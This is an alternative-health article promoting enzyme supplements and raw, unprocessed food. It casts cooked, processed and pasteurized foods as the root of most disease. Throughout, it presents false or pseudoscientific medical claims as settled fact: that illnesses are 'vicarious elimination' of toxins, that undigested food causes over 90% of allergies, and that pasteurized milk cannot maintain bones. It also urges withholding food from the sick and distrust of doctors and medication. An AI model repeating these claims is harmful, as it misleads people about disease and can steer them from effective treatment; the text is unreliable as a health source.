In the wacky marketplace of today ’s food supplements , we ’re assaulted on all sides by people screaming Vitamins ! , others yelling Minerals ! , and others hollering Enzymes ! as though each one alone were the Magic Bullet that can cure anything .
The real ideas are cooperation , synergy , and co-factoring .
Nothing exists in isolation in the body .
An enzyme without co-factors has no enzyme activity .
SPECIFIC SHAPES
Enzymes have very specific jobs to do .
Their activity is compared to keys that must fit certain locks .
Enzymes are long - chain proteins held together in very specific shapes by hydrogen bonds .
If anything happens to the Velcro - like bonds , the enzyme protein unravels , losing its shape .
Without the shape , the key can no longer fit the lock .
Then it ’s no longer an enzyme – just another foreign protein .
What do foreign proteins cause in our body ?
Right – inflammation .
Immune response .
And that ’s exactly the meaning of auto - immune .
The body now attacks itself because it senses there ’s an alien on board .
Self has become not - self .
If the bonds are broken , the enzyme collapses , and can no longer do its job .
Such a collapsed enzyme is said to be denatured .
Several things cause an enzyme to become denatured :
heating above 118 F ( cooking )
drugs
alcohol
fluoride
free radicals
food processing
canning
irradiation
genetic engineering
COOKED VS .
RAW
Edward Howell MD , world authority on enzymes and human nutrition , talks about how enzymes are denatured above 118 F .
Since water boils at 212 F , you can see how cooking is detrimental to most foods .
That ’s why when it comes to vegetables , raw is best , steaming is much better than overcooking .
Fad diet recommendations that ignore this basic premise are all the more flawed .
The more intact enzymes still in the food , the less we tax the body ’s own enzyme stores .
SAVINGS ACCOUNT
We have two main types of enzymes in our bodies .
Dr. Edward Howell , in his masterwork Enzyme Nutrition [ 5 ] , tells us it ’s as though we are given a bank account of enzyme energy at the beginning of our lives .
The bank account contains two types of enzyme currency :
– metabolic enzymes
– digestive enzymes
The more of that bank account we have to use for digestion , the less is left over for the thousands of other tasks which the metabolic enzymes have to perform in our bodies .
Details like thinking , breathing , walking , seeing , cell life , etc. – all depend on enzymes .
Think of people grossly overweight .
Do they perform these various functions well , or do they seem impaired ?
Simply , they have to expend too much of their enzyme energy trying to digest all the heaps of indigestible food that keeps coming down the hatch .
METABOLIC ENZYMES
Metabolic means having to do with operating the body ’s specific systems .
Cell life , nerve transmission , brain signals , hormone distribution , oxygen exchange , liver function , acid - base balance in the blood , stuff like that .
All these jobs require specific enzymes in order to happen , on a second - by - second basis .
Metabolic enzymes are the worker protein molecules that keep this whole biochemical circus going all day long .
Over 5000 metabolic enzymes have been identified in the human body . [ 5 ]
DIGESTIVE ENZYMES
The class of enzymes you ’re probably most familiar with is the one that involves digestion .
The mouth , the stomach , the pancreas , the liver , and the intestine produce various enzymes whose job is to break down any food we eat into usable components .
No matter how greasy , no matter how much extra cheese , or how much white sugar , how many chemicals , no matter how indigestible a food is , your body will try to break it down by means of enzymes .
Some foods are very easy on the body .
Turns out , those are the ones which contain within them all the enzymes necessary for complete digestion .
Examples : apples , corn , watermelon , green peppers , pears , celery , etc . Raw fruits and vegetables .
These foods do n’t require that the body waste energy producing a lot of powerful digestive juices in order to change them into a usable form .
THREE FOODS
We all know that human food comes in three varieties :
fats
protein
carbohydrates
Each is a large molecule .
Since the body prefers smaller units , these large fat , protein , and carbohydrate chains must be broken down .
Fats are broken down to fatty acids ; proteins are broken down to amino acids ; carbohydrates are broken down to glucose molecules .
The process of breakdown is called digestion .
Each food type has a special enzyme to make this breakdown happen :
Lipase
is the enzyme that breaks down fat .
Proteases
break down protein .
Amylase
breaks down carbohydrates .
Now many doctors and others with no background in nutrition will say that we can eat anything we want because the body ’s digestive enzymes are designed to break the food down .
This would be true if we were eating an 80 % natural diet .
The natural diet leaves behind no residue from the digestive activity .
That is normal digestion .
But we do n’t have a natural diet .
Most of us have the Standard American Diet .
You know – burgers , fries , pizza , beer , chips , donuts , coke , ho - hos , chicken nuggets , ice cream , buffalo wings , oreos , velveeta , ranch , snickers , cheetos , etc .
These are non-foods , new to the human species in the past century .
Our digestive systems were never designed to break these chemical freakazoids down .
So the stuff does n’t get digested – it just sits there , rotting .
Abnormal diet = abnormal digestion .
TOXEMIA AND VICARIOUS ELIMINATION
Toxemia means blood poisoning .
Way back in 1926 , a famous Colorado healer , JH Tilden MD , wrote a book which was the culmination of a lifetime of clinical experience , Toxemia Explained .
Dr. Tilden was radical .
He did n’t believe drugs cured disease .
He had one simple thesis :
“… every so - called disease is a crisis of toxemia , which means that toxin has accumulated in the blood above the toleration point .
… the crisis , the so - called disease – call it cold , flu , pneumonia , headache , or typhoid fever – is a vicarious elimination .
Nature is endeavoring to rid the body of toxin . ”
Toxemia Explained p. 49 [ 8 ]
A disease is named for where the toxins accumulate so much that that body part starts failing .
This model of disease , known as vicarious elimination , has never been disproven .
What happens is , the normal avenues for expelling waste – liver , kidneys , and colon – are overwhelmed .
As a survival instinct , other organs of the body become enlisted to help get rid of wastes .
They try desperately to expel the indigestible , rotting poisons , often becoming inflamed or diseased themselves in the attempt .
One obvious example of this idea is acne .
Acne is not a skin problem .
It is a vicarious elimination : the blood and the colon are so backed up with poisons that are accumulating faster than they can escape that the body tries an extreme solution : expel the poisons through the body ’s largest organ : the skin .
An alternative escape route .
As the poisons leave , they irritate the normal skin and cause rash , redness , or pustulated eruptions , like pimples or boils .
This is why skin creams and lotions do n’t work in such a scenario .
It ’s not a skin problem .
It ’s a problem of chronic blood poisoning from of an indigestible diet .
Third World people rarely get acne .
Acne is a disease of excess , a consequence of the fast food lifestyle .
Chronic ‘ incurable ’ eczema and psoriasis often fall into the same category .
People suffer needlessly for years with these diseases , under the direction of their well - intentioned but clueless dermatologist who has convinced them that their only hope is to find the right medication for their ‘ skin disease . ’
Same with the kidneys .
Their original job was simply to maintain water and electrolyte balance within the blood .
But with the advent of modern foods of commerce , suddenly the kidneys find themselves spending all their energy trying to filter out these new manmade chemicals from the blood – a function for which they were never designed .
Result : kidney disease today is the # 9 cause of death in the US . [ 1 ]
Dr. Henry Bieler offers another example of vicarious elimination : the lungs take over for the kidneys .
When the level of toxins in the blood exceeds the kidneys ’ capacity to eliminate them via the urine , the lungs try to take up some of the slack .
The lungs secrete some of the blood ’s toxins through their mucous membranes .
Such toxicity irritates and inflames the delicate lung membranes , and can be the initial cause of pneumonia , bronchitis , asthma , edema or virtually any other lung problem . ( p 164 ) [ 6 ]
Same with a cold .
A cold is simply the body ’s way of saying that the level of toxicity has now surpassed the body ’s ability to get rid of wastes through the normal avenues : colon , kidneys , and liver .
So it will try alternative or vicarious routes : nose , mouth , throat , eyes , or lungs .
Bieler uses this same model to explain dysmenorrhea and pelvic inflammatory disease : irritation of female organs when they are used as alternate routes of toxin removal from the blood , every month .
At menopause , when this avenue of detox falls into disuse , various new problems may occur as a result .
( p 172 ) .
Vicarious elimination : an organ of reproduction being used as an emergency organ of detoxification .
Again , Tilden ’s theory of vicarious elimination is that many diseases are really just an organ ’s emergency attempt to discharge excess poisons because the primary avenues are overloaded .
If that body part is overwhelmed in the process , it becomes diseased and we pretend that that organ , in isolation from the rest of the body , is the problem .
Such thinking is more than just simplistic and disingenuous ; if medical decisions are based on false perceptions characterizing the diseased organ as the disease , the results will range from ineffective to fatal .
Dr. Tilden felt that undigested food in the intestines and in the blood was the primary cause of all disease .
His ideas are now being substantiated in most gastroenterology journals , which explore in great detail the ‘ modern ’ phenomenon of
LEAKY GUT SYNDROME
The reason the food remains undigested is lack of enzymes .
Here ’s what happens :
We eat trashy food .
We ca n’t digest it .
It remains in our intestines in a rotting form for weeks on end .
Eventually the protective intestinal lining weakens and allows some of the rotting , undigested food to enter the bloodstream .
Once in the blood , the toxic debris can settle just about anywhere .
As a foreign protein , the debris can then initiate an inflammatory reaction at the particular location where it happens to end up .
The snap diagnosis is that we have a problem at the site of the inflammation : the joints , the muscles , the liver , the kidneys , the intestines , the stomach , whatever .
Then we are given drugs to cover up the symptoms .
Doctors pretend they can treat that single ‘ problem ’ part in isolation from the rest of the body .
That ’s why it does n’t work .
According to Dr. Tilden , these types of chronic , mysterious illnesses almost always have toxemia as the root cause .
Dr. Tilden was ahead of his time .
His ideas are far superior to modern drug remedies .
In most chronic disease situations , especially one that has baffled all the medical geniuses , Tilden ’s approach should be tried first , if one is to have any hope at all of a complete , permanent recovery .
Thomas Sydenham , the most famous English physician of the 17th century , long ago supported Tilden :
“ Disease is nothing else than an attempt on the part of the body to rid itself of morbific matter . ”
– Bieler , p 40 [ 6 ]
Morbific – that means dead and rotting .
For more on the colon see Journey to the Center of Your Colon .
THE SHELF - LIFE BUSINESS
Let ’s talk about processed foods .
How did all these artificial , devitalized foods become the main components of the American diet in the first place ?
Long story .
In 1910 Harvey Wiley , MD was the first head of the original FDA .
Dr. Wiley was a big critic of food adulteration .
He was against bleached flour , refined sugar , and the sale of adulterated , devitalized foods .
He once tried to prevent the Coca Cola Company from shipping Coke across interstate lines because it had white sugar in it , which Dr. Wiley correctly described as an adulterated food .
Then Wiley actually began seizing shipments of bleached flour .
A legal battle ensued and went all the way to the Supreme Court in 1913 .
Wiley won .
Bleach was proven to be an empty filler , whose main purpose was to kill bugs and bulk up the flour .
This law has never been enforced , or reversed either .
Soon thereafter the huge financial interests controlling food processing banded together and got Wiley thrown out of office .
Ever since we have had white flour , which has no food value whatsoever – no vitamins , no minerals , no enzymes , and which often contains large amounts of bleach – ( Bealle , Royal Lee )
That ’s what bread labels even today are talking about when they state ‘ unbleached flour . ’ [ 6 , 9 ]
Food processing has only been around for about the last 100 years or so .
Food processing came about mainly during wartime when we had to figure out how to transport large quantities of food to the WWI soldiers without spoiling on the way .
Scientists found out that the more efficient were the methods of removing enzymes from foods , the better it transported and the longer it lasted .
After the war , the techniques that had been earned were applied to the grocery business .
The supermarket industry soon found out that profits could be greatly increased if foods can be made to last longer without spoiling .
If that meant that they were also removing most or all of the nutrition from the food along with the enzymes , hey , too bad .
The manufacturers were n’t in the health business ; this was the Shelf - Life business .
Scientific methods of enzyme removal and food preservation became more and more sophisticated .
Chemical additives came in , which do nothing to nourish the body – it ’s just about the money .
And now the two new buzzwords are irradiation and genetic engineering .
Do you think any of these methods has anything to do with increasing the nutritive value of foods ?
This is big business , driven by one motive only .
GOOD LIVER – GOOD LIFE
One of the first organs to be overwhelmed by the constant deluge of toxic fast foods is the liver , the most important organ of the body .
Bieler feels that if the liver were able to keep up with cleansing the blood of all the indigestible debris we shove down our throats , we would live more or less indefinitely .
( Bieler , p63 )
Before it gets into general circulation , digested food from the intestine goes first through the liver via the portal vein .
The liver is then supposed to choose what to do with the digested food
i. make new body tissues
ii . release energy
iii .
store nutrients for future use
Unfortunately in an enzyme - less diet that consists of 80 % hard fats and refined sugars , the liver hardly has time to get around to these standard life functions .
Instead it wastes most of its energy and power just trying to tread water in a sewer of chemicals .
Liver cells die , cirrhosis results , and this is today the # 10 cause of death in the US .
( Historical Statistics [ 1 ] )
The human liver evolved from 60 million years of animal liver evolution .
For all but the last 100 years of man ’s 200,000 years , the human diet was simple fruits and vegetables , with a little animal protein .
Thus was the liver allowed to develop normally and concentrate on its main tasks , which did not involve toxic waste breakdown .
Modern processed foods are a shock to evolution .
( Food Is Your Best Medicine , p 183 ) [ 6 ]
Bieler explains the idiocy of trying to force the liver and kidneys to work harder by falsely whipping them into action by adrenal - stimulating steroid and diuretic drugs , which is the standard medical approach .
This is a short - term solution and will ultimately result in organ destruction .
The simple fact is , the liver and kidneys were never meant to work this hard , spending all their metabolic energy trying to deal with enzymeless processed food chemicals from our horrible diet .
Bieler , p 142 ) [ 6 ]
WESTON A. PRICE
Once there was a dentist named Dr. Weston A. Price .
In the 1930s , he and his wife went around the world , gathering data from dozens of countries .
He was looking for the healthiest people on earth .
That is , the ones with the longest lifespan , no degenerative disease , no tooth decay , the strongest bones , and best physiques .
Everywhere he went , Dr. Price would check the bones and teeth of various tribes and civilizations , including :
Swiss Alpine villages
Fiji
Eskimos
Seminole Indians
Canadian Indians
Scottish primitives
Melanesia
Hawaii
What Price found was startling and undeniable : across the board , those primitive civilizations and cultures enjoyed sound teeth , strong bones , and lives generally free from degenerative disease , provided there was adequate natural food and a mineral - rich water supply .
Then invariably , as soon as the enzymeless foods of commerce became available to these simple people , within a few years , their teeth would be rotten , their bones would soften , and they would experience the onset of epidemic degenerative diseases , just like the ones that prevail in America today .
Like Royal Lee and JH Tilden , Price is talking about white flour , white sugar , and processed , devitalized adulterated foods . [ 7 ]
The common factor in the new foods which infiltrated and corrupted the diets of these primitive societies , again , was lack of enzymes .
Dr. Price also examined ancient skulls from the burial grounds of many of these civilizations .
He was looking to correlate the amount of tooth decay with the formation of the dental arches , as well as the formation of the facial bones and the nostrils .
Location after location , Price ’s findings were overwhelmingly consistent : when the isolated people had a primitive diet consisting of fish , whole grains , raw dairy , and a mineral - rich environment , the people enjoyed perfect teeth , and a very low incidence of infectious and degenerative disease .
Price correlated beyond a doubt the exposure of primitive people to white flour and white sugar with all the following :
Bone thinning
Facial deformity
Mouth breathing , because the nostrils did not develop properly
Rampant tooth decay
Tuberculosis
Arthritis
Price shows how physical degeneration of a group of people who may have enjoyed nearly perfect health for centuries – how this situation can be destroyed within a few years of being exposed to the foods of commerce – white sugar , white flour , and processed devitalized products .
Dr. Price ’s book is called Nutrition and Physical Degeneration , [ 7 ] and is still in print .
No nutritionist or dietician can claim to be well - informed without a thorough understanding of this landmark work .
Remember , nutritionists and dieticians are the ones who design hospital food , airline cuisine , and school lunches .
THE IDIOCY OF THE HIGH PROTEIN DIET
Because of advertising , and ‘ soft ’ advertising in which scripted information is made to look like hard news , food fads are as rampant today as ever .
Eat for your blood type , eat for your body type , eat for your horoscope , eat for your recovered memories , eat what your muscle testing says , eat according to your ethnicity , eat according to the results of your hair analysis – junk science is at its zenith in America today .
Not the least unscientific of these is the popular high protein diet .
Riding high on the cholesterol / heart disease myth , and the Dangers of Carbs spectre , the high protein diet was the new messiah – the ultimate healthy diet .
Nothing could be farther from the truth .
Obviously if someone is pounding fries and ice cream and coke all day long , and suddenly he trades up to the high protein diet , there are going to be some immediate improvements in the way the patient feels .
But the same effect would probably have been obtained by an all citrus diet , or Price ’s diet of raw milk and rye cakes .
There are many physiologic nightmares which are promoted by the Atkins approach .
We ’ll look at just a few :
A long - term high protein diet exclusive of good fats and natural carbohydrates is very detrimental to the kidneys , the liver , and the blood .
The breakdown products of processed artificial protein are highly acidifying to the blood and tract .
In addition to blocking most digestive and metabolic enzymes by constantly lowering the body ’s pH , this sets in motion the whole calcium buffering program in which the pH of the blood is saved from all the dangerous acidification by pulling calcium out of the bones and teeth .
The body ’s next effort may be to precipitate some of the excess protein out of solution in the form of uric acid crystals .
These may then be deposited in joints and organs , resulting in arthritis , kidney stones , gallstones , etc .
Too much protein in the diet putrefies in the digestive tract , setting up blockage , leaky gut syndrome , and a whole host of intestinal disorders .
Excess nitrogen in the system from all those excess amino acids further stresses the blood .
The food advertisers pretend that we need more protein and less fat .
The more protein and the less fat , the better .
The truth is , Americans average 125g of protein per day , while only requiring 25 g. ( MacDougall )
We are not protein deficient in this country .
That only happens in Third World starvation countries .
The reason for this Protein Religion is simple economics : high protein foods are expensive .
It ’s a sales job .
At stake are billion $ in foods and billion$ in advertising .
The high protein diet is of course aggressively promoted by the entire soy- pandering contingent .
Having perpetrated the lie that soy is a complete , safe protein , far superior to those fat - laden animal proteins , the soy sellers are enjoying huge success by means of consistent and ubiquitous persuasion methods in all media .
This concept is just as false and as dangerous as the high protein diet itself .
For the whole story please see The Magic Bean .
Food faddists like to complicate things , deriving rules and patterns out of thin air .
Usually for the end purpose of book or supplement or food sales .
A reasonable proportion of fats , protein , and carbohydrates is just common sense .
Less important than the proportion of fats , protein , and carbohydrates is the form in which each is presented .
Digestible or indigestible ?
Natural or processed ?
Raw or cooked ?
Sprayed or organic ?
Cleanse or clog ?
With or without enzymes ?
These are the real issues that determine the value of a food .
These are the questions we should be asking .
The other major misconception is the fat - free phobia that has taken hold in this country .
Controlled by advertising from huge food interests , false information is everywhere about the dangers of fat and cholesterol and how this causes heart disease , etc .
The solution ?
Processed soy , a toxic indigestible non-food containing the worst possible type of fat : altered fats .
The irony is that Americans are now actually fat deficient , having been tricked into thinking that all fats are bad .
We need good fats , essential fatty acids , and we ’re not getting them .
( Erasmus ) [ 20 ]
MILK – A DEVITALIZED ENZYMELESS FOOD
The absence of enzymes in modern dairy products exists by definition : milk is pronounced ‘ pasteurized ’ only when all the enzymes have been removed by heating .
From pasteurized milk we then get butter , ice cream , cheese , yoghurt , and milk chocolate .
Problem is , all these foods ca n’t be digested .
Undigested food goes all over the body and causes chronic low - grade inflammation .
And blockages .
That is why holistic nutritionists generally agree that milk is the # 1 cause of allergies .
Do n’t believe it ?
Take away all dairy for 60 days from the allergy or asthmatic child .
The operative word here is all .
See what happens to the allergies .
( Allergies : The Threshold of Reactivity )
Yes I know what you ’re thinking – where will we get our calcium from then ?
Big surprise : milk is not a good source of calcium because the enzyme phosphatase , which is necessary to absorb calcium , was destroyed by pasteurization .
( Douglass )
The only reason we think we need milk for calcium is that we ’ve heard it all our lives – on TV , in school nutrition programs , from dieticians .
But guess who paid for all that advertising and promotion ?
Starting way back in the 1950s , the American Dairy Association spent millions providing ‘ educational ’ materials for American grade schools in which dairy products are presented as one of the Four Food Groups .
This never had anything to do with science – this is marketing .
There ’s no such thing as the four food groups .
They made it up !
( McDougall ) [ 21 ]
So , as for the calcium requirements of children :
“… Pasteurized milk is incapable of rebuilding or maintaining bones and teeth . ”
– Royal Lee , 1955 [ 9 ]
And as for digestion :
“ commercially modified milk and baby foods are all foreign to the baby ’s liver digestion and may produce diarrhea , milk allergies , and constipation . ”
– H. Bieler , 1965 [ 6 ]
It is not just Africans who have lactose intolerance – all humans have lactose intolerance when it comes to pasteurized milk .
But it ’s still a word game : lactose is milk sugar .
We ’re not allergic to milk sugar ; we ’re allergic to milk .
No enzymes = junk food .
Milk is a junk food .
Think your baby needs it ?
Think again .
Pasteurized cow ’s milk is sensitizing your baby to an unnatural non-food allergenic protein .
Consider this : man is the only animal who figured out how to remove enzymes from milk .
For the whole story on milk , read Twogood ’s No Milk and Dr Ron Schmid ’s The Untold Story of Milk . [ 12 , 22 ]
Also see the pediatrician chapter .
Milk is a very common example of an artificial , man -made food about which a century of advertising has created the illusion of a healthy staple .
The same ideas apply to other processed foods .
That means one that has been devitalized by the food industry by removing all the enzymes .
Problem is , only the enzymes made it a living complex in the first place .
The above comments about milk refer only to pasteurized milk .
Raw milk from cows living in a natural mineral - rich environment is another story altogether .
Dr. Price thoroughly documents the health of Swiss Alpine villagers , isolated from processed foods .
Some of these healthy people lived on a diet centered around raw butter and raw cheese , from cows and goats .
Their health was far better than most of ours today .
The point is that natural , unprocessed , unpasteurized dairy products could be a superlative nutritional staple , because it is loaded with the fat soluble vitamins A , D , and E , minerals and enzymes .
What destroys milk is civilization : killing the enzymes by heat , adding antibiotics and hormones to the cows ’ diet , keeping the cows in a mineral deficient environment , and artificially preparing it for long periods of storage .
( Price )
EATING IN AMERICA : A CONDITIONED RESPONSE
Let ’s talk about the food we eat .
Now most of us know what we should eat .
But when it actually comes down to it , we simply eat food that ‘ we ’re hungry for . ’
We ca n’t really be blamed for this , right ?
Billions of dollars are spent conditioning us about what we should feel hungry for .
Look at TV , billboards , radio , newspapers – what are we constantly assaulted with ?
Images of burgers , fries , ice cream , chips , Pepsi , candy , donuts , milk , cheese , MGD , etc .
Just hearing these words makes our Pavlovian mouths water .
These are the best poisons ever made .
Not only do they contain little or no nutrient content ; even if they did there ’s almost no chance of our getting to it because these foods have no enzymes in them .
All those were taken out during processing .
Therefore the entire burden of digestion is placed on our body ’s own enzymes .
Foods are being broken down only partially , or not at all , by our own digestive enzymes , because many foods are so foreign , so processed , have so many chemicals and preservatives , and are so new to the human race that they overstress our body ’s ability to metabolize them .
GARBAGE IN , GARBAGE IN
So what happens to all this undigested food ?
Where does it go ?
Well , what happens is , a lot goes in , but never comes out .
Too vague ?
The average 35 year old has between 4 - 22 lbs of undigested food in the intestine alone , even according to the FDA .
( Richard Anderson ) Apocryphal evidence says John Wayne on autopsy was found to have closer to 44 lbs. of it !
Elvis was said to have had more than 20 lbs .
As noted above , this rotting debris does n’t just stay in the intestine , but can make its way intact into the bloodstream , to be deposited in practically any location of the body .
Such food is foreign and may cause inflammation in any area where it becomes lodged – Leaky Gut Syndrome .
It can be the mechanism for just about any - itis you can think of : arthritis , gastritis , colitis , hepatitis , nephritis , myositis , bursitis , etc .
As well as allergies .
Such floating debris triggers the immune response .
If it ’s always there , the body ’s always reacting to it .
Symptoms of that reaction are :
fatigue
stuffy nose
asthma
sneezing
blocked sinuses
skin rashes
fibromyalgia
chronic fatigue syndrome
ALLERGIES !
Reaction to undigested food has been implicated as the cause of over 90 % of allergies .
( See Allergies : The Threshold of Reactivity )
All these conditions usually do n’t just pop up for no reason , or because of some genetic tendency .
People pretend they ’re allergic to dust , pollen , dog hair , cat fur , horse feathers , phases of the moon , etc .
But why look for an exotic cause when the obvious is staring you in the face ?
Years of eating food that cannot be broken down has predictable and definite physical consequences .
Diet does not affect your health ; diet determines your health .
Know anyone taking allergy shots and pills for years that still has allergies every year ?
Why would the allergist cure them ?
Job security , James .
Ten to one the missing piece of the puzzle is enzymes .
Try the60 Day Program .
ENZYMES AND AGING
A very clear chain of events connects enzyme depletion with the aging process : undigested food clogs the digestive tract .
The stuck food rots there , and creates toxins and free radicals .
Free radicals destroy cells , causing premature aging of tissues .
Free radicals attack the cell membrane causing them to shrivel up and dehydrate , and subjecting the DNA to alteration from outside forces .
Large undigested molecules seep into the bloodstream from the intestine , gumming up the blood , blocking normal oxygen distribution to the body .
Cells are starved , causing premature cell death .
This is not even controversial – any pathology text documents Leaky Gut Syndrome , hypertension , and chronically blocked circulation as the result of undigested fats .
Worse yet , much of the immune system depends on circulating white cells .
When the blood gets all backed up with undigested sludge , these cells ca n’t circulate .
Result : depressed immune function .
Aging .
Fifty years ago embalmers at funeral homes had to prepare the corpse immediately after death because it would soon rot .
Today there ’s not such a hurry .
After a lifetime of preservatives , spices , artificial additives , hydrogenated oils , and hard fats the modern corpse can sit out for a few days without going bad .
It ’s pickled .
As Bieler says , we have effected the mummification of the living . [ 6 ] ( p 220 )
SICK ANIMALS
Dr. Howell makes the observation that humans are the only animals who , in their natural environment , live their lives with disease .
Think about it : how many human diseases are there in the pathology textbooks ?
1000 ?
What other animal in nature gets even 5 diseases ?
Why ?
Dr. Howell explains that humans are the only animals that eat processed foods , the only animals who subsist on enzyme - less food :
“ All wild creatures get their enzyme supplements in the raw food itself . ” – Enzyme Nutrition p7 [ 5 ]
The saliva of horses and cattle does n’t even contain enzymes , like ours does .
The work of digestion is largely aided by the enzymes in the grass or hay they eat .
A whale that had 32 seals in its stomach was found to secrete no digestive enzymes !
( Howell ) [ 5 ]
Digestion took place by means of enzymes contained within the seals themselves .
Think of the burden this removes from the whale ’s digestive system during his lifetime .
Or more accurately , since we ’re the exception , think of the burden enzymeless food places on our systems .
We must expend great quantities of energy producing and maintaining digestive enzymes that Dr. Howell describes as “ pathologically rich . ”
What a waste of energy .
At what a price .
Almost a century ago , France ’s finest surgeon noted the ill effects of commercial foods given to pedigreed dogs :
“ In successive generations of purebred dogs , nervousness is often observed to increase .
This phenomenon occurs in subjects brought up under artificial conditions , living in comfortable kennels , and provided with choice food quite different from that of their ancestors , the shepherds , who fought and defeated the wolves . ” – Alexis Carrel , p 106 [ 14 ]
BLOOD : THE INTERNAL MILIEU
Going back to the blood now , and the idea of toxicity , remember that the blood was the carrier which deposited all the undigested food debris in various locations throughout the body .
But this type of debris also has observable effects on the red blood cells themselves .
Undigested fats and protein in the diet commonly cause a condition known aserythrocyte aggregation , which is simply clumping of the red cells .
This causes circulation problems and may be the primary cause of chronic fatigue .
It stands to reason – if the blood cells are all stuck together like globs of motor oil , they cannot flow very easily through the blood vessels .
Circulation is the only way that the body ’s cells can obtain oxygen , which they need every second .
Clumping of red cells graphically decreases the amount of oxygen that is being carried to the tissues .
We ’re not just talking about fatigue anymore ; lack of oxygen spells tissue degeneration , premature aging , and early death .
Just think of the stress that clumped up red blood cells put on the heart .
Red cells are supposed to be free and separate so they can circulate easily .
What is the # 1 cause of death in the US ?
Alexis Carrel also demonstrated how the longevity of cells is largely determined by two things : their ability to take in oxygen and nutrients and expel wastes .
That ’s it .
Longevity of cells obviously determines longevity of the body .
Clumping of red cells from daily processed foods diet prevents both oxygen in and waste out .
It ’s not rocket science .
OXYGEN AND CHOLESTEROL
Those shooting pains down the legs or arms are sometimes simply the result of muscles being forced to operate without sufficient oxygen , screaming in protest .
Again , lack of available oxygen can cause degeneration and dysfunction of any organ or system of the entire body : arteries , heart , lungs , skin , kidneys , digestion , you name it .
The oxidized cholesterol crystals from all the hydrogenated foods that precipitate out of solution in the blood – these crystals classically lodge in joints and muscles , and cause gallstones , gout , fibromyalgia , and arthritis .
How many of us in our 40s still eat the same way we did when we were teenagers ?
It ’s the road to ruin .
We ’re just flesh and blood after all .
CHRONIC FATIGUE
Ever get food poisoning ?
Or maybe you know someone .
Every single day in America 200,000 people get food poisoning , 900 of them are hospitalized , and 14 die .
( Schlosser ) Usually we think of food poisoning as being violently ill , throwing up , and being incapacitated for a few days , because of having gotten some bad food at a restaurant .
But there ’s another type of food poisoning that is much more common , in fact , epidemic .
This is the type of disorder the doctors and hospitals just ca n’t quite put their finger on .
The tests are all negative .
But the problem just goes on and on : no energy , intermittent sharp pains in the stomach area , bad skin , bad breath , chronic low - grade allergies , constant feeling of impending disaster – like things are just ‘ not right . ’
The catch - all diagnosis is Chronic Fatigue Syndrome .
This type of food poisoning results from years of eating a diet deficient in enzymes , vitamins , and minerals .
All those GMO snacks and fast food and dairy simply ca n’t be broken down .
The body is starving from lack of nutrients .
Holistic doctors call this phenomenon malnutrition of the affluent .
Funny to think how someone 70 or 80 lbs. overweight can be starving , but that ’s exactly what ’s going on .
Their constant hunger is a never - fulfilled craving , always hoping that some real nutrients will actually come down the hatch .
But instead , pattern eating takes over – the sweet , soft foods , hydrogenated fats and oils , seasoned to taste with a ton of white sugar and salt .
Comfort foods .
And that is why obese people can’t lose weight – if they cut down their eating the body actually thinks that it is starving and tries to conserve as much of everything as possible because it ’s in Survival Mode .
CHRONIC INDIGESTION – TAPING THE OIL LIGHT
Gas , bloating , heartburn , stomach ache , feeling full when beginning to eat , abdominal cramping , unsatisfied hunger – these are common symptoms of enzyme deficiency .
But most doctors treat such problems as though they were signs of drug deficiency !
Perfect examples are Tagamet and Prilosec – standard drugs given for indigestion and heartburn .
Now the main reason there is pain is simple : blockage .
All that pizza and fries and tacos and yoghurt is devitalized food : no enzymes .
As a result , once in the stomach , it just sits there .
The stomach produces more and more acids and digestive enzymes trying to break down this overcooked , chemical - laden sludge we mistakenly refer to as food .
But it ca n’t do it .
All that digestive juice sitting there unable to do its work is uncomfortable .
It burns the stomach .
On swallowing , the acid splashes back into the esophagus causing a painful condition known as reflux esophagitis , or heartburn .
The New England Journal in 2010 stated that20 % of the US population has reflux .
By 2015 , NIH was reporting reflux in18 % - 27 % of the population in North America . ( 24 )
So first the geniuses try Tagamet , with the idea that all the excess acid needs to be absorbed .
When that does n’t work , enter Prilosec .
The shrewd rationale behind this brain - child is to stop all digestion by halting further production of digestive juices by the body .
Short - term , the discomfort is postponed , but what about the underlying cause – the sludge sitting there in the stomach ?
It now begins to rot ( go rancid , putrefy , or ferment , depending on whether it is fat , protein or carbohydrate ) .
We call it Irritable Bowel Syndrome , Crohn ’s Disease , chronic colitis , Leaky Gut Syndrome , and later – colon cancer .
FADS AND TRENDS
Do n’t get caught up in the Milligram Game .
Or the Calorie Game .
Start with the basics .
If the food was never broken down in the digestive tract , well then , it went right through you .
Or worse , it ’s still in there .
It does n’t matter what we eat ; it only matters what we digest .
HOW FAT WAS SHE ?
Had to go through a revolving door in two trips ?
High school picture an aerial photograph ?
Hog farmers learned long ago that hogs get fat twice as fast if they are fed cooked food .
Cooking destroys what ?
Right .
Enzymes .
The definition of obese is that a person weighs 30 % more than his normal weight .
The Centers for Disease Control in Atlanta now says : 37 % of Americans are obese .
But 60 % are overweight .
For anyone who doubts these figures , empirical verification may help : go to the mall and sit on a bench in the concourse for half an hour .
People get fat because they eat cooked and processed foods – enzymeless foods which can not be broken down .
LARGE PLEASE
Even more than the quality of food , it ’s the quantity that makes fat Americans .
Consider this : for normal nutrition , humans need about 25 grams of protein per day .
Our average intake is 125 grams !
( McDougall [ 21 ] )
As for white sugar , we consume an average of 160 pounds per person per year .
How much do we need ?
Zero !
White sugar has no food value .
( Sugar : The Sweet Thief of Life )
As for fats , that ’s a whole story in itself .
The body requires essential fat for optimum health , but only natural fats – like in avocadoes , raw nuts , flaxseed , cocoanut , and fish .
These foods contain the fat enzyme lipase – which breaks them down .
But that ’s not what we eat .
The fats we load up on are artificial , manmade fats like in chips , fries , and margarine .
These artificial fats are non-foods , indigestible , and are bioaccumulative .
They make for clogged arteries , cellulite , and spare tireage ; once in the body they become rancid trans fatty acids .
Rancid trans fatty acids are a major producer of free radicals .
And that means aging , cell breakdown , and DNA mutation – confirmed reservations for an eventual all expense paid vacation in sunny ICU .
Most sick animals refuse all food until the healing power of nature ( vis medicatrix naturae ) has the opportunity to excrete the poisons .
Often the greater part of the poison is undigested , rotting food which has somehow become blocked in the digestive tract .
To eat in such a situation is only compounding the problem .
Nature knows better .
So forget about the old saw Feed a cold ; Starve a fever .
Starve both until the patient is hungry .
Listen to the innate wisdom of the body ; it ’s usually right .
PUT IT BACK !
So what ’s the solution ?
Same as the problem : enzymes .
Either eat an 80 % natural foods diet full of natural enzymes , or else put back into the food the enzymes that were taken out by food processing .
Put back into the body the enzymes that can detox the blood and the tissues , where all this half - digested residue has taken up residence .
Want to detox the system ?
That ’s your choice : whole foods or whole food enzymes .
Natural whole food enzyme supplements take away nothing from the body and require that no energy be expended by the body to get rid of them after they ’ve done their job .
